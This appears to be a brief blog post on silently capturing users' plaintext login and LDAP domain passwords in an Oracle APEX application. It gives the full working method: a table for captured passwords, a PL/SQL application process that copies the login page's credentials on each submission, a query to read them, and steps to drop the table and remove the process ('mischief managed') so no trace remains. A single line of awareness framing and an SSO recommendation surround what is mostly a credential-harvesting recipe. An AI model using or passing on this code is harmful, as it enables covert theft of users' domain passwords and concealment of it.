You can easily capture user passwords when they login to your application.
So if your company use LDAP or any kind of verification, where user is filling the form with password on APEX page, you can capture it. Whenever they login you will have their login name and domain password.
I don't need to tell you that you should not do that, but you should be aware of this issue and you should avoid weak verifications if possible. The best way how to avoid this issue is to use SSO.
- Create table for captured passwords:
CREATE TABLE passwords ( user_name VARCHAR2(255) NOT NULL, password VARCHAR2(255), created_at DATE, -- CONSTRAINT pk_passwords PRIMARY KEY (user_name) );
- In your APEX application go to Shared Components, Application Processes and click Create.
- Select Point On Submit: After Page Submission - After Computations and Validations. Enter PL/SQL code below:
MERGE INTO passwords t USING ( SELECT APEX_UTIL.GET_SESSION_STATE('P9999_USERNAME') AS user_name, APEX_UTIL.GET_SESSION_STATE('P9999_PASSWORD') AS password, SYSDATE AS created_at FROM DUAL WHERE APEX_UTIL.GET_SESSION_STATE('P9999_USERNAME') IS NOT NULL ) s ON (s.user_name = t.user_name) WHEN MATCHED THEN UPDATE SET t.password = s.password, t.created_at = s.created_at WHEN NOT MATCHED THEN INSERT (t.user_name, t.password, t.created_at) VALUES (s.user_name, s.password, s.created_at);
- Set Condition Type to Expression PL/SQL and Expression to:
APEX_APPLICATION.G_FLOW_STEP_ID = 9999
- You may need to adust this if your login page have different number.
- Check results and cleanup:
-- mischief managed SELECT p.* FROM passwords p ORDER BY p.created_at DESC; -- drop table and remove process from APEX DROP TABLE passwords PURGE;